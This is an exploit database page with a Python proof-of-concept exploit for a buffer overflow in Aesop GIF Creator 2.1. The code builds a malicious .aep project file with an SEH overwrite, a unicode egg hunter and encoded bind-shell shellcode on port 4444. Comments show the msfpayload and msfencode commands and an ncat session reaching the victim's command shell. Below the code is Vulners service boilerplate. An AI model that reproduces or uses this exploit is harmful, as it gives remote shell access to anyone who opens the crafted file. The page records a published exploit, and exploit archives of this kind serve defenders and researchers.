Lucene search
K

Aesop-GIF-Creator-2.1

🗓️ 05 Jan 2015 19:06:16Reported by xsploitedsecType 
exploitpack
 exploitpack
👁 9 Views

Aesop GIF Creator v2.1 Buffer Overflow Exploit PoC by xsploitedse

Code
import struct
import sys
 
about = "\r\n==================================================================\n"
about +=  " Title: Aesop GIF Creator <= v2.1 (.aep) Buffer Overflow Exploit PoC\n"
about +=  " Author: xsploitedsec\n URL: http://www.x-sploited.com/\n"
about +=  " Contact: xsploitedsecurity [at] x-sploited.com\n"
about +=  "=================================================================="
print about
 
# root@bt:~# msfpayload windows/shell_bind_tcp lport=4444 lhost=0.0.0.0 EXITFUNC=seh R
# | msfencode -e x86/alpha_upper -c 1 -t c -b '\x1a\x19\x0a' > /tmp/aesop.txt
# [*] x86/alpha_upper succeeded with size 752 (iteration=1)
#
# root@bt:~# ncat 10.0.1.16 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:\>
 
# Unmolested, ASCII shellcode buried in stack ftw!?
bindshell = (
"\xda\xca\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x43\x43\x43"
"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4b\x39\x43\x30\x43"
"\x30\x43\x30\x43\x50\x4d\x59\x4d\x35\x50\x31\x4e\x32\x42\x44"
"\x4c\x4b\x51\x42\x50\x30\x4c\x4b\x46\x32\x44\x4c\x4c\x4b\x50"
"\x52\x44\x54\x4c\x4b\x44\x32\x47\x58\x44\x4f\x48\x37\x50\x4a"
"\x47\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x45"
"\x31\x43\x4c\x44\x42\x46\x4c\x47\x50\x4f\x31\x48\x4f\x44\x4d"
"\x43\x31\x48\x47\x4d\x32\x4c\x30\x50\x52\x51\x47\x4c\x4b\x51"
"\x42\x42\x30\x4c\x4b\x47\x32\x47\x4c\x43\x31\x48\x50\x4c\x4b"
"\x47\x30\x44\x38\x4c\x45\x4f\x30\x43\x44\x50\x4a\x43\x31\x48"
"\x50\x46\x30\x4c\x4b\x51\x58\x44\x58\x4c\x4b\x51\x48\x51\x30"
"\x43\x31\x4e\x33\x4a\x43\x47\x4c\x47\x39\x4c\x4b\x50\x34\x4c"
"\x4b\x45\x51\x4e\x36\x46\x51\x4b\x4f\x46\x51\x49\x50\x4e\x4c"
"\x4f\x31\x48\x4f\x44\x4d\x43\x31\x48\x47\x50\x38\x4b\x50\x42"
"\x55\x4c\x34\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x51\x34"
"\x42\x55\x4a\x42\x50\x58\x4c\x4b\x46\x38\x51\x34\x45\x51\x48"
"\x53\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x58\x45\x4c"
"\x43\x31\x4e\x33\x4c\x4b\x45\x54\x4c\x4b\x45\x51\x48\x50\x4c"
"\x49\x47\x34\x46\x44\x47\x54\x51\x4b\x51\x4b\x45\x31\x46\x39"
"\x51\x4a\x50\x51\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a\x4c"
"\x4b\x42\x32\x4a\x4b\x4c\x46\x51\x4d\x43\x58\x47\x43\x46\x52"
"\x45\x50\x45\x50\x45\x38\x43\x47\x44\x33\x47\x42\x51\x4f\x51"
"\x44\x43\x58\x50\x4c\x42\x57\x46\x46\x43\x37\x4b\x4f\x49\x45"
"\x4f\x48\x4a\x30\x43\x31\x43\x30\x45\x50\x51\x39\x49\x54\x51"
"\x44\x46\x30\x43\x58\x51\x39\x4b\x30\x42\x4b\x43\x30\x4b\x4f"
"\x4e\x35\x46\x30\x46\x30\x50\x50\x50\x50\x47\x30\x50\x50\x51"
"\x50\x50\x50\x45\x38\x4a\x4a\x44\x4f\x49\x4f\x4d\x30\x4b\x4f"
"\x4e\x35\x4b\x39\x48\x47\x46\x51\x49\x4b\x51\x43\x45\x38\x44"
"\x42\x45\x50\x42\x31\x51\x4c\x4b\x39\x4b\x56\x42\x4a\x44\x50"
"\x51\x46\x46\x37\x45\x38\x49\x52\x49\x4b\x50\x37\x45\x37\x4b"
"\x4f\x4e\x35\x46\x33\x51\x47\x43\x58\x48\x37\x4a\x49\x47\x48"
"\x4b\x4f\x4b\x4f\x4e\x35\x50\x53\x46\x33\x46\x37\x42\x48\x43"
"\x44\x4a\x4c\x47\x4b\x4d\x31\x4b\x4f\x4e\x35\x50\x57\x4b\x39"
"\x49\x57\x42\x48\x44\x35\x42\x4e\x50\x4d\x45\x31\x4b\x4f\x49"
"\x45\x45\x38\x43\x53\x42\x4d\x45\x34\x43\x30\x4c\x49\x4b\x53"
"\x50\x57\x50\x57\x51\x47\x46\x51\x4a\x56\x43\x5a\x45\x42\x50"
"\x59\x50\x56\x4d\x32\x4b\x4d\x43\x56\x48\x47\x51\x54\x47\x54"
"\x47\x4c\x43\x31\x43\x31\x4c\x4d\x51\x54\x51\x34\x44\x50\x4f"
"\x36\x43\x30\x51\x54\x50\x54\x46\x30\x46\x36\x46\x36\x46\x36"
"\x51\x56\x50\x56\x50\x4e\x50\x56\x50\x56\x50\x53\x46\x36\x43"
"\x58\x44\x39\x48\x4c\x47\x4f\x4d\x56\x4b\x4f\x49\x45\x4c\x49"
"\x4d\x30\x50\x4e\x46\x36\x47\x36\x4b\x4f\x46\x50\x42\x48\x43"
"\x38\x4b\x37\x45\x4d\x43\x50\x4b\x4f\x48\x55\x4f\x4b\x4b\x4e"
"\x44\x4e\x46\x52\x4b\x5a\x43\x58\x4e\x46\x4c\x55\x4f\x4d\x4d"
"\x4d\x4b\x4f\x48\x55\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4b\x30"
"\x4b\x4b\x4d\x30\x43\x45\x43\x35\x4f\x4b\x47\x37\x45\x43\x43"
"\x42\x42\x4f\x42\x4a\x43\x30\x51\x43\x4b\x4f\x4e\x35\x45\x5a"
"\x41\x41"
);
 
# unicode encoded, egg="w00t"
egg_hunter = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ"
"1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AY"
"AZBABABABAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ44J"
"O7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA"
);
 
# aesop project file header
prj_header = (
"\x5B\x41\x65\x73\x6F\x70\x20\x50\x72\x6F\x6A\x65\x63\x74\x20\x46\x69\x6C"
"\x65\x20\x76\x2E\x32\x2E\x30\x5D\x0D\x0A\x7B\x50\x69\x63\x74\x75\x72\x65"
"\x3D"
);
 
#hunter tag ="w00tw00t"
egg = "\x77\x30\x30\x74\x77\x30\x30\x74"; 
seh_offset = 669;
 
# Begin payload buffer
payload = "\x41" * seh_offset;
# NSEH
payload += "\x61";                        #popad
payload += "\x73";                        #nopalign/add byte ptr [ebx],dh
# SE handler
payload += "\xB1\x42";                    #unicode compatible p/p/r - Aesop.exe (universal)
# Prepare/jump->EAX
payload += "\x73";                        #venetian/add byte ptr [ebx],dh
payload += "\x55";                        #push ebp
payload += "\x73";                        #venetian/add byte ptr [ebx],dh
payload += "\x58";                        #pop eax
payload += "\x73";                        #venetian/add byte ptr [ebx],dh
payload += "\x05\x19\x11";                #add eax, 0x19002200h
payload += "\x73";                        #venetian/add byte ptr [ebx],dh
payload += "\x2d\x11\x11";                #sub eax, 0x12007200h
payload += "\x73";                        #venetian/add byte ptr [ebx],dh
payload += "\x50";                        #push eax
payload += "\x73";                        #add byte ptr [ebx],dh
payload += "\xc3";                        #ret
 
payload += "\x41" * 242;                  #align egghunter with->(ebp+650)
payload += egg_hunter;
payload += "\x41" * 1000;                 #give shellcode some breathing room
 
payload += egg;
payload += bindshell;
 
payload += "\x44" * (5000-len(payload)); #junk padding
# End payload buffer
 
xsploitme = (prj_header + payload);
print("\n[*] Creating file->xsploited.aep");
 
try:
    out_file = open("xsploited.aep",'w');
    out_file.write(xsploitme);
    out_file.close();
    print("[+] xsploited.aep created successfully");
    print("[*] 1. Launch the file or open it via Aesop.exe");
    print("[*] 2. Wait a sec for egghunter and netcat in :)\n[-] Exiting...\r");
except (IOError):
    print("[!] Error creating file\n[-] Exiting...\r");

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jan 2015 19:06Current
0.3Low risk
Vulners AI Score0.3
9